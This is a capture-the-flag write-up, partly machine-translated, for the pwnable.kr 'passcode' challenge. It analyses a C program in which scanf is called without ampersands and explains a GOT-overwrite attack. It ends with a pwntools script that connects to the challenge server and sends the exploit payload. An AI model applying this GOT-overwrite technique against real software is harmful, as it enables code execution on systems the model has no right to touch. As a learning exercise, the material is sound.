0x000 open environment
① View source code:
1 #include 2 #include 3 4 void login(){ 5 int passcode1; 6 int passcode2; 7 8 printf("enter passcode1 : "); 9 scanf("%d", passcode1); 10 fflush(stdin); 11 12 // ha! mommy told me that 32bit is vulnerable to bruteforcing :) 13 printf("enter passcode2 : "); 14 scanf("%d", passcode2); 15 16 printf("checking...\n"); 17 if(passcode1==338150 && passcode2==13371337){ 18 printf("Login OK!\n"); 19 system("/bin/cat flag"); 20 } 21 else{ 22 printf("Login Failed!\n"); 23 exit(0); 24 } 25 } 26 27 void welcome(){ 28 char name[100]; 29 printf("enter you name : "); 30 scanf("%100s", name); 31 printf("Welcome %s!\n", name); 32 } 33 34 int main(){ 35 printf("Toddler's Secure Login System 1.0 beta.\n"); 36 37 welcome(); 38 login(); 39 40 // something after login... 41 printf("Now I can safely trust you that you have credential :)\n"); 42 return 0; 43 }
tips:
② source code analysis
From the line 17 "passcode1 == 338 150 & amp; & amp; passcode2 == 13,371,337 ", it can be seen passcode1 passcode and corresponding conditions are satisfied, may perform "System ( " / bin / CAT In Flag " );", but a closer look , 9 and 14 rows parameter is not found ampersands, this description is a pointer, an address is not, the function retrieves from the stack 4 bytes, the vulnerability here,
Decompile passcode file, print login function,
Have not found the whole stack operation, indicating name and passcode1 in the same stack, and passcode2 a canary, it can not move, only passcode1 dynamic, and how to perform System ( " / bin / CAT Flag " ); it , puts @ plt see this logo, you can try got table override technology (personal understanding is that the function address storage table, and the table plt one correspondence). Got a look at the table:
There may use the function printf, fflush, exit, because the login function has to call these three functions, using the address table cover got written system function, then this function is called as long as you can get the flag.
0x001 use loopholes
The idea has been very clear, and now is to find the address name and address passcode1 calculate the distance between them; address and system functions; entry address printf / fflush / exit of.
The address is easy to see name ebp-x070
passcode1 the address ebp-0x10.
passcode1 name and phase difference 96 bytes, 100 bytes but opened name space, so the name. 4 bytes can just cover the address pointer passcode1. The four-byte address entry is written printf / fflush / exit, and their entry address can be viewed via the following command:
Then covered with four byte address system got an address table, the system can be viewed in the login function address, the address 0x80485e3. The principle here is to cover the table got passcode1 address coverage to fflush or printf or exit address, then use the scanf function to overwrite the address system in the past. And other such call fflush or printf or exit on the call became a system.
0x002 payload structure
Address 96 constituting the payload of any character, a function entry address (printf / fflush / exit) of, system function
python script as follows:
from pwn import * pwn_ssh=ssh(host='pwnable.kr',user='passcode',password='guest',port=2222) print (pwn_ssh.connected()) sh=pwn_ssh.process(executable="./passcode") print (sh.recv()) sh.sendline('A'*96+'\x04\xa0\x04\x08'+'134514135') print (sh.recvall())
